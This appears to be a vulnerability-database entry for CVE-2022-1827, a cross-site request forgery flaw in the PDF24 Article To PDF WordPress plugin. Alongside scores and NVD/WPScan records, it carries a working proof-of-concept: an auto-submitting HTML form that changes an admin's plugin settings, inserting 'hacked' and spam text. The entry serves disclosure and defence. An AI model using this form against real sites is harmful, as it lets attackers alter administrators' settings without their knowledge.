DATABASE RESOURCES PRICING ABOUT US

{"id": "WPEX-ID:0BD25283-E079-4010-B139-CCE9AFB1D54D", "vendorId": null, "type": "wpexploit", "bulletinFamily": "exploit", "title": "PDF24 Article To PDF <= 4.2.2 - Arbitrary Settings Update via CSRF", "description": "The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack\n", "published": "2022-05-30T00:00:00", "modified": "2022-05-30T09:03:22", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE", "baseScore": 4.3}, "severity": "MEDIUM", "exploitabilityScore": 8.6, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": true}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, "href": "", "reporter": "Daniel Ruf", "references": [], "cvelist": ["CVE-2022-1827"], "immutableFields": [], "lastseen": "2022-06-28T20:22:47", "viewCount": 15, "enchantments": {"vulnersScore": "PENDING"}, "_state": {}, "_internal": {}, "sourceData": "<form id=\"test\" action=\"https://example.com/wp-admin/options-general.php?page=pdf24\" method=\"POST\">\r\n <input type=\"text\" name=\"language\" value=\"en\">\r\n <input type=\"text\" name=\"availability\" value=\"public\">\r\n <input type=\"text\" name=\"contentCompression\" value=\"on\">\r\n <input type=\"text\" name=\"docOptionsInUse\" value=\"on\">\r\n <input type=\"text\" name=\"docHeader\" value=\"hacked\">\r\n <input type=\"text\" name=\"docSize\" value=\"A4\">\r\n <input type=\"text\" name=\"docOrientation\" value=\"portrait\">\r\n <input type=\"text\" name=\"docStyle\" value=\"\">\r\n <input type=\"text\" name=\"docDefaultFilename\" value=\"\">\r\n <input type=\"text\" name=\"docHomeFilename\" value=\"\">\r\n <input type=\"text\" name=\"docSingleFilename\" value=\"\">\r\n <input type=\"text\" name=\"docPageFilename\" value=\"\">\r\n <input type=\"text\" name=\"docCategoryFilename\" value=\"\">\r\n <input type=\"text\" name=\"docSearchFilename\" value=\"\">\r\n <input type=\"text\" name=\"emailOptionsInUse\" value=\"on\">\r\n <input type=\"text\" name=\"emailType\" value=\"text/plain\">\r\n <input type=\"text\" name=\"emailSubject\" value=\"hacked\">\r\n <input type=\"text\" name=\"emailFrom\" value=\"hacked\">\r\n <input type=\"text\" name=\"emailText\" value=\"please buy my rolex\">\r\n <input type=\"text\" name=\"cpInUse\" value=\"on\">\r\n <input type=\"text\" name=\"cpDisplayMode\" value=\"bottom\">\r\n <input type=\"text\" name=\"cpStyle\" value=\"default_elbf\">\r\n <textarea name=\"cpCustomStyle\">.pdf24Plugin-cp {\r\n\tborder:1px solid silver;\r\n}\r\n\r\n.pdf24Plugin-cp input[type=\"text\"] {\r\n\twidth:200px;\r\n\tborder:1px solid silver;\r\n\tmargin:0;\r\n\tpadding:2px;\r\n}\r\n\r\n.pdf24Plugin-cp input[type=\"submit\"] {\r\n\tmargin:0;\r\n\tpadding:2px 10px !important;\r\n}\r\n\r\n.pdf24Plugin-cp form {\r\n\tmargin:0;\r\n\tpadding:0;\r\n}\r\n\r\n.pdf24Plugin-cp img {\r\n\theight:32px;\r\n}\r\n\r\n.pdf24Plugin-cp span, .pdf24Plugin-cp input, .pdf24Plugin-cp img {\r\n\tvertical-align:middle;\r\n}\r\n\r\n.pdf24Plugin-cp * {\r\n\tfont-size:90%;\r\n}</textarea>\r\n <input type=\"text\" name=\"sbpInUse\" value=\"on\">\r\n <input type=\"text\" name=\"sbpStyle\" value=\"default_dsbfl\">\r\n <textarea name=\"sbpCustomStyle\">.pdf24Plugin-sbp {\r\n\ttext-align:center;\r\n\tborder: 1px solid silver;\r\n\tpadding: 5px;\r\n}\r\n.pdf24Plugin-sbp-link a {\r\n\tfont-weight:bold;\r\n}\r\n.pdf24Plugin-sbp-bl {\r\n\tfont-size:smaller;\r\n}</textarea>\r\n <input type=\"text\" name=\"tbpStyle\" value=\"default_dflb\">\r\n <textarea name=\"tbpCustomStyle\">.pdf24Plugin-tbp {\r\n\tpadding: 3px;\r\n\twidth:600px;\r\n\tmargin:auto;\r\n}\r\n.pdf24Plugin-tbp * {\r\n\tfont-size: 90%;\r\n}</textarea>\r\n <input type=\"text\" name=\"lpStyle\" value=\"default_dfl\">\r\n <textarea name=\"lpCustomStyle\">.pdf24Plugin-lp-link a {\r\n}</textarea>\r\n <input type=\"text\" name=\"lang-enterEmail\" value=\"Enter email address\">\r\n <input type=\"text\" name=\"lang-send\" value=\"Send\">\r\n <input type=\"text\" name=\"lang-sendArticleAsPDF\" value=\"Send article as PDF\">\r\n <input type=\"text\" name=\"lang-sendArticlesAsPDF\" value=\"Send articles as PDF\">\r\n <input type=\"text\" name=\"lang-downloadArticleAsPDF\" value=\"Download article as PDF\">\r\n <input type=\"text\" name=\"lang-downloadArticlesAsPDF\" value=\"Download articles as PDF\">\r\n <input type=\"text\" name=\"lang-createPDF\" value=\"Create PDF\">\r\n <textarea name=\"docTpl\"><html>\r\n<head>\r\n\t<base href=\"{baseUrl}\" />\r\n\t<title>{headline}</title>\r\n\t<meta http-equiv=\"content-type\" content=\"text/html; charset={charset}\" />\t\r\n\t<style type=\"text/css\">\r\n\t\t{css}\r\n\t</style>\r\n</head>\r\n<body>\r\n\t<h1><a href=\"{headlineUrl}\">{headline}</a></h1>\r\n\t<div>{content}</div>\r\n</body>\r\n</html></textarea>\r\n <textarea name=\"docEntryTpl\"><div class=\"bodyPart\">\r\n\t<h2><a href=\"{url}\">{title}</a></h2>\r\n\t<div class=\"meta\">{dateTime} &nbsp; {author}</div>\r\n\t<div class=\"text\">{text}</div>\r\n</div></textarea>\r\n <input type=\"text\" name=\"update\" value=\"Save Changes\">\r\n</form>\r\n<script>\r\n document.getElementById(\"test\").submit();\r\n</script>", "generation": 0}

{"cve": [{"lastseen": "2022-06-28T18:19:17", "description": "The PDF24 Article To PDF WordPress plugin through 4.2.2 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-06-20T11:15:00", "type": "cve", "title": "CVE-2022-1827", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1827"], "modified": "2022-06-28T16:42:00", "cpe": ["cpe:/a:pdf24_articles_to_pdf_project:pdf24_articles_to_pdf:4.2.2"], "id": "CVE-2022-1827", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-1827", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:pdf24_articles_to_pdf_project:pdf24_articles_to_pdf:4.2.2:*:*:*:*:wordpress:*:*"]}], "wpvulndb": [{"lastseen": "2022-06-28T20:22:47", "description": "The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack\n\n### PoC\n\n.pdf24Plugin-cp { border:1px solid silver; } .pdf24Plugin-cp input[type=\"text\"] { width:200px; border:1px solid silver; margin:0; padding:2px; } .pdf24Plugin-cp input[type=\"submit\"] { margin:0; padding:2px 10px !important; } .pdf24Plugin-cp form { margin:0; padding:0; } .pdf24Plugin-cp img { height:32px; } .pdf24Plugin-cp span, .pdf24Plugin-cp input, .pdf24Plugin-cp img { vertical-align:middle; } .pdf24Plugin-cp * { font-size:90%; } .pdf24Plugin-sbp { text-align:center; border: 1px solid silver; padding: 5px; } .pdf24Plugin-sbp-link a { font-weight:bold; } .pdf24Plugin-sbp-bl { font-size:smaller; } .pdf24Plugin-tbp { padding: 3px; width:600px; margin:auto; } .pdf24Plugin-tbp * { font-size: 90%; } .pdf24Plugin-lp-link a { }\n\n# [{headline}](<{headlineUrl}>)\n\n{content}\n\n## [{title}](<{url}>)\n\n{dateTime} {author}\n\n{text}\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-05-30T00:00:00", "type": "wpvulndb", "title": "PDF24 Article To PDF <= 4.2.2 - Arbitrary Settings Update via CSRF", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1827"], "modified": "2022-05-30T09:03:22", "id": "WPVDB-ID:0BD25283-E079-4010-B139-CCE9AFB1D54D", "href": "https://wpscan.com/vulnerability/0bd25283-e079-4010-b139-cce9afb1d54d", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}]}